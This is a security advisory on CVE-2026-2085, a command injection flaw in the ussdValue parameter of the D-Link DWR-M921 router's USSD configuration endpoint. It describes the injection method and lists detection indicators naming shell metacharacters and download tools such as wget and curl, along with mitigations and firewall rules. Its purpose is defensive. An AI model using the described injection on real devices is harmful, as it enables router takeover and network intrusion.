CVE-2026-2085: D-Link DWR-M921 Firmware RCE Vulnerability

CVE-2026-2085 Overview

CVE-2026-2085 is a command injection vulnerability in the D-Link DWR-M921 router running firmware version 1.1.50. The flaw resides in the sub_419F20 function within the /boafrm/formUSSDSetup endpoint, which handles USSD (Unstructured Supplementary Service Data) configuration. Attackers can manipulate the ussdValue parameter to inject arbitrary operating system commands. The attack is exploitable over the network, and the exploit has been disclosed publicly. The vulnerability maps to [CWE-77] (Improper Neutralization of Special Elements used in a Command) and [CWE-74] (Improper Neutralization of Special Elements in Output).

Critical Impact

Authenticated remote attackers can execute arbitrary commands on the underlying router operating system, gaining full control over the device and the network segments it serves.

Affected Products

• D-Link DWR-M921 router (hardware)
• D-Link DWR-M921 firmware version 1.1.50
• USSD Configuration Endpoint (/boafrm/formUSSDSetup)

Discovery Timeline

• 2026-02-07 - CVE-2026-2085 published to NVD
• 2026-02-12 - Last updated in NVD database

Technical Details for CVE-2026-2085

Vulnerability Analysis

The DWR-M921 is a 4G LTE router that exposes a web-based administrative interface backed by the boa HTTP server. The USSD configuration handler /boafrm/formUSSDSetup invokes the internal function sub_419F20 to process user-supplied USSD codes. The handler passes the ussdValue argument into a shell command without proper neutralization of shell metacharacters. An attacker with access to an authenticated session can inject command separators such as ;, |, or backticks into ussdValue to execute arbitrary commands as the web server process, which typically runs with root privileges on embedded D-Link devices.

Successful exploitation results in full device compromise. Attackers can pivot into the internal network, intercept or modify traffic, harvest credentials, install persistent firmware implants, and enroll the device into botnets.

Root Cause

The root cause is missing input sanitization on the ussdValue HTTP parameter before it is concatenated into a shell command string. The firmware does not enforce an allow-list of permitted USSD characters (typically digits, *, and #) and does not invoke the command through a safe execution API that separates arguments from the command interpreter.

Attack Vector

The attack vector is network-based and targets the router's HTTP management interface. Required privileges are high, meaning the attacker must hold valid administrative credentials to reach the USSD configuration form. Once authenticated, the attacker sends a crafted POST request to /boafrm/formUSSDSetup with a malicious ussdValue payload containing embedded shell commands. No user interaction is required beyond the attacker's own request submission.

The vulnerability manifests when the firmware concatenates the unsanitized ussdValue into a shell invocation handled by sub_419F20. Public disclosure details are tracked in the GitHub Issue Discussion and the VulDB entry #344652.

Detection Methods for CVE-2026-2085

Indicators of Compromise

• HTTP POST requests to /boafrm/formUSSDSetup containing shell metacharacters (;, |, &, backticks, $()) inside the ussdValue parameter.
• Unexpected outbound connections originating from the router's management plane to attacker-controlled infrastructure.
• New or modified processes spawned by the boa web server, particularly shells (sh, busybox) or download utilities (wget, curl, tftp).
• Modified /etc configuration files, cron entries, or rc scripts on the device.

Detection Strategies

• Inspect router HTTP access logs and any upstream WAF or reverse proxy logs for POSTs to /boafrm/formUSSDSetup with non-USSD characters in ussdValue.
• Deploy network IDS signatures that flag shell metacharacters in form parameters destined for the router management interface.
• Baseline normal administrative traffic patterns and alert on USSD configuration changes outside of approved change windows.
• Correlate authentication events on the router with subsequent USSD endpoint requests to detect credential abuse.

Monitoring Recommendations

• Forward router syslog and HTTP server logs to a centralized log platform for retention and analysis.
• Monitor DNS and NetFlow data for the router's management IP to identify unexpected egress destinations.
• Track firmware integrity by periodically comparing running firmware hashes against known-good baselines.

How to Mitigate CVE-2026-2085

Immediate Actions Required

• Restrict access to the router's web management interface to trusted management VLANs or jump hosts; never expose it to the public internet.
• Rotate administrative credentials and enforce strong, unique passwords for all router accounts.
• Disable the USSD configuration feature if it is not required for operational use.
• Audit the router for unauthorized configuration changes, new accounts, and unexpected processes or scripts.

Patch Information

No vendor patch has been referenced in the published advisory at the time of NVD publication. Administrators should monitor the D-Link support portal for firmware updates addressing the DWR-M921 1.1.50 USSD command injection issue. Apply firmware updates as soon as they are released by the vendor.

Workarounds

• Place the router's management interface behind a firewall ACL that only permits inbound connections from authorized administrative IP ranges.
• Require VPN access for any remote administration of the device.
• Disable remote management (WAN-side administration) entirely if not required.
• Segment IoT and SOHO routers onto isolated management networks to limit blast radius if a device is compromised.

# Example firewall ACL restricting router management to a trusted subnet
iptables -A INPUT -p tcp --dport 80 -s 10.10.10.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -s 10.10.10.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP